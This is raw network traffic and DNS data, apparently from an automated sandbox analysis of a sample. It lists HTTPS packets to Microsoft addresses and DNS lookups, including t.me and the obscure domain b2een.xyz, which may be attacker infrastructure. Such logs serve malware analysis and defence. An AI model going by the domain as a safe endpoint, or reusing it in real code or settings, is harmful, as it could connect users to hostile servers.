Nov 25, 2024 11:34:54.178802013 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.178819895 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.248109102 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.251359940 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.251508951 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.251597881 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.251863003 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.251878023 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.251887083 CET	50090	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.251892090 CET	443	50090	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.254643917 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.254755020 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.254877090 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.255054951 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.255068064 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.374911070 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.377943039 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.378024101 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.378170967 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.378170967 CET	50091	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.378180027 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.378190041 CET	443	50091	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.381069899 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.381086111 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.381213903 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.381380081 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.381392002 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.383728027 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.384151936 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.384186983 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.384598017 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.384607077 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.563179970 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.566982031 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.567018986 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.567095995 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.567173004 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.567189932 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.567203045 CET	50092	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.567213058 CET	443	50092	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.569789886 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.569813013 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.569900990 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.570050955 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.570063114 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.832577944 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.835680962 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.835757017 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.835813046 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.835835934 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.835874081 CET	50093	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.835881948 CET	443	50093	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.838571072 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.838591099 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:54.838650942 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.838792086 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:54.838803053 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:55.792916059 CET	49900	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:55.792927027 CET	443	49900	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:55.792952061 CET	49899	443	192.168.2.5	162.159.61.3
Nov 25, 2024 11:34:55.792972088 CET	443	49899	162.159.61.3	192.168.2.5
Nov 25, 2024 11:34:55.977416039 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:55.983849049 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:55.983875036 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.005297899 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.005306959 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.026496887 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.035654068 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.035676956 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.039974928 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.039983034 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.161848068 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.162300110 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.162309885 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.162755013 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.162759066 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.290019989 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.290499926 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.290524960 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.290941954 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.290947914 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.409868956 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.413399935 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.413475037 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.413526058 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.413547039 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.413558960 CET	50095	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.413564920 CET	443	50095	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.416925907 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.416954041 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.417017937 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.417186022 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.417193890 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.480532885 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.483164072 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.483239889 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.483278036 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.483295918 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.483309984 CET	50094	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.483325005 CET	443	50094	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.486071110 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.486093044 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.486156940 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.486289024 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.486305952 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.559520960 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.560000896 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.560019016 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.560554028 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.560558081 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.609332085 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.612289906 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.612333059 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.612333059 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.612380028 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.612420082 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.612427950 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.612456083 CET	50096	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.612461090 CET	443	50096	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.615389109 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.615428925 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.615514040 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.615648031 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.615658045 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.724215984 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.727361917 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.727417946 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.727471113 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.727480888 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.727494955 CET	50097	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.727499008 CET	443	50097	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.730823040 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.730859995 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.730918884 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.731239080 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.731259108 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.994719982 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.997709990 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.997752905 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.997800112 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.997843981 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.997924089 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.997935057 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:56.997948885 CET	50098	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:56.997953892 CET	443	50098	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:57.000659943 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:57.000699997 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:57.000801086 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:57.000922918 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:57.000930071 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.202244043 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.204389095 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.204418898 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.204873085 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.204876900 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.275559902 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.276181936 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.276212931 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.276638031 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.276644945 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.395010948 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.395478964 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.395504951 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.396087885 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.396094084 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.445873022 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.447200060 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.447221041 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.447823048 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.447834969 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.644727945 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.647713900 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.647784948 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.647851944 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.647871971 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.647881985 CET	50100	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.647886992 CET	443	50100	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.652686119 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.652720928 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.652792931 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.653403997 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.653419018 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.720066071 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.720107079 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.720165968 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.720187902 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.720280886 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.720683098 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.720704079 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.720719099 CET	50101	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.720725060 CET	443	50101	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.723519087 CET	50106	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.723566055 CET	443	50106	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.723624945 CET	50106	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.723782063 CET	50106	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.723797083 CET	443	50106	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.837791920 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.840987921 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.843554974 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.843677998 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.843743086 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.843765020 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.843777895 CET	50102	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.843784094 CET	443	50102	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.844116926 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.844132900 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.844794989 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.844804049 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.847290993 CET	50107	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.847317934 CET	443	50107	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.847400904 CET	50107	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.847563982 CET	50107	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.847568989 CET	443	50107	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.879519939 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.882944107 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.883027077 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.883102894 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.883114100 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.883126974 CET	50103	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.883132935 CET	443	50103	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.886364937 CET	50108	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.886415005 CET	443	50108	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:58.886499882 CET	50108	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.886693954 CET	50108	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:58.886708021 CET	443	50108	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:59.295646906 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:59.298943043 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:59.299010992 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:59.299351931 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:59.299372911 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:59.299381971 CET	50104	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:59.299388885 CET	443	50104	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:59.302997112 CET	50109	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:59.303025961 CET	443	50109	13.107.246.63	192.168.2.5
Nov 25, 2024 11:34:59.303137064 CET	50109	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:59.303316116 CET	50109	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:34:59.303323030 CET	443	50109	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.131010056 CET	49969	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:35:00.131026983 CET	49970	443	192.168.2.5	204.79.197.219
Nov 25, 2024 11:35:00.131047964 CET	443	49969	204.79.197.219	192.168.2.5
Nov 25, 2024 11:35:00.131067991 CET	443	49970	204.79.197.219	192.168.2.5
Nov 25, 2024 11:35:00.447839022 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.450575113 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.450598001 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.451051950 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.451059103 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.512727976 CET	443	50106	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.513313055 CET	50106	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.513331890 CET	443	50106	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.513930082 CET	50106	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.513935089 CET	443	50106	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.601727962 CET	443	50108	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.602616072 CET	50108	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.602646112 CET	443	50108	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.603811026 CET	50108	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.603817940 CET	443	50108	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.695696115 CET	443	50107	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.698297024 CET	50107	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.698329926 CET	443	50107	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.698904037 CET	50107	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.698909044 CET	443	50107	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.889662027 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.893112898 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.893210888 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.893232107 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.893292904 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.893351078 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.893364906 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.893390894 CET	50105	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.893397093 CET	443	50105	13.107.246.63	192.168.2.5
Nov 25, 2024 11:35:00.896562099 CET	50110	443	192.168.2.5	13.107.246.63
Nov 25, 2024 11:35:00.896621943 CET	443	50110	13.107.246.63	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 11:33:18.234122992 CET	192.168.2.5	1.1.1.1	0x3cfe	Standard query (0)	t.me	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:20.386684895 CET	192.168.2.5	1.1.1.1	0x7c69	Standard query (0)	b2een.xyz	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:42.814609051 CET	192.168.2.5	1.1.1.1	0x10fb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:42.814728022 CET	192.168.2.5	1.1.1.1	0x6df7	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 25, 2024 11:33:49.617870092 CET	192.168.2.5	1.1.1.1	0xa4f3	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:49.618139029 CET	192.168.2.5	1.1.1.1	0xa86d	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 25, 2024 11:33:56.559776068 CET	192.168.2.5	1.1.1.1	0xef83	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:56.560184956 CET	192.168.2.5	1.1.1.1	0x511b	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 25, 2024 11:34:00.123284101 CET	192.168.2.5	1.1.1.1	0x4042	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.123534918 CET	192.168.2.5	1.1.1.1	0x5e9c	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 25, 2024 11:34:00.128851891 CET	192.168.2.5	1.1.1.1	0x5670	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.129081011 CET	192.168.2.5	1.1.1.1	0x7836	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 25, 2024 11:34:00.602276087 CET	192.168.2.5	1.1.1.1	0x23bd	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.603037119 CET	192.168.2.5	1.1.1.1	0x62d0	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 25, 2024 11:34:00.603540897 CET	192.168.2.5	1.1.1.1	0xbfc1	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.603795052 CET	192.168.2.5	1.1.1.1	0x951a	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 25, 2024 11:34:00.612955093 CET	192.168.2.5	1.1.1.1	0x5446	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:34:00.613156080 CET	192.168.2.5	1.1.1.1	0xf453	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 11:33:18.371370077 CET	1.1.1.1	192.168.2.5	0x3cfe	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:20.623497009 CET	1.1.1.1	192.168.2.5	0x7c69	No error (0)	b2een.xyz		49.13.32.95	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:42.951639891 CET	1.1.1.1	192.168.2.5	0x6df7	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 25, 2024 11:33:42.951957941 CET	1.1.1.1	192.168.2.5	0x10fb	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:49.756021976 CET	1.1.1.1	192.168.2.5	0xa4f3	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:33:49.756021976 CET	1.1.1.1	192.168.2.5	0xa4f3	No error (0)	plus.l.google.com		142.250.181.110	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:49.756423950 CET	1.1.1.1	192.168.2.5	0xa86d	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:33:56.698152065 CET	1.1.1.1	192.168.2.5	0xef83	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:33:56.698983908 CET	1.1.1.1	192.168.2.5	0x511b	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:33:56.705023050 CET	1.1.1.1	192.168.2.5	0x2156	No error (0)	svc.ha-teams.office.com	mira-tmc.tm-4.office.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:33:57.037046909 CET	1.1.1.1	192.168.2.5	0x9bb0	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:33:57.037046909 CET	1.1.1.1	192.168.2.5	0x9bb0	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 25, 2024 11:33:57.349113941 CET	1.1.1.1	192.168.2.5	0x62d7	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:34:00.262933969 CET	1.1.1.1	192.168.2.5	0x5e9c	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 11:34:00.270237923 CET	1.1.1.1	192.168.2.5	0x5670	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
